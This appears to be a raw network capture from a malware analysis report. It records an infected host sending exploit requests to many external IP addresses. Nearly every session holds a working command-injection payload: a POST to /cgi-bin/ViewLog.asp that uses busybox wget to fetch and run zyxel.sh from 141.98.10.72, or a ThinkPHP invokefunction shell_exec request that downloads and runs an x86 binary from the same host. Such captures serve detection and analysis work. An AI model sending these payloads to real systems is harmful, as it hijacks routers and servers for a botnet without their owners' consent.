                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1021192.168.2.145019094.120.19.2208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.621104002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1022192.168.2.144014694.123.26.378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.621445894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1023192.168.2.144594031.200.56.1918080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.623050928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1024192.168.2.145683695.216.104.17880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.942152977 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:16.168356895 CET410INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:16 GMT
                                                        Server: Apache/2.4.6
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1025192.168.2.144704495.217.180.5580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.942907095 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:16.170171022 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1026192.168.2.144246495.86.82.16980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:15.972518921 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1027192.168.2.145834695.100.146.2580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:16.156521082 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:16.369436026 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:16 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:16 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 35 39 32 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 37 31 36 26 23 34 36 3b 32 63 62 64 33 62 64 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;1592645f&#46;1707899716&#46;2cbd3bdb</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1028192.168.2.143776295.235.209.5580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:16.182215929 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:17.384666920 CET600INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                        Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget 404 Not FoundContent-Type: text/htmlContent-Length: 341Date: Wed, 14 Feb 2024 09:40:08 GMTServer: ulwsd/1.0.1-20140331X-Frame-Options: SAMEORIGIN


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1029192.168.2.145988895.183.36.18180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:16.209389925 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:16.446424961 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:35:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1030192.168.2.143686495.143.172.880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:16.358860970 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:16.561270952 CET395INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:16 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 150
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=15768000; includeSubdomains; preload
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1031192.168.2.144973295.110.159.2680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:16.387790918 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:16.607477903 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:35:15 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1032192.168.2.145344494.131.10.308080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.125528097 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:18.358756065 CET59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1033192.168.2.144725031.136.18.2338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.126593113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:18.819541931 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:20.227626085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:23.235395908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:28.867314100 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:40.130676031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:03.169809103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1034192.168.2.143639862.204.93.1208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.317190886 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:18.520427942 CET697INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:18 GMT
                                                        Server: Apache/2.4.56 (Debian)
                                                        Referrer-Policy: no-referrer
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Permitted-Cross-Domain-Policies: none
                                                        X-Robots-Tag: noindex, nofollow
                                                        X-XSS-Protection: 1; mode=block
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1035192.168.2.145843894.8.141.1488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:18.552303076 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1036192.168.2.143415494.158.245.748080
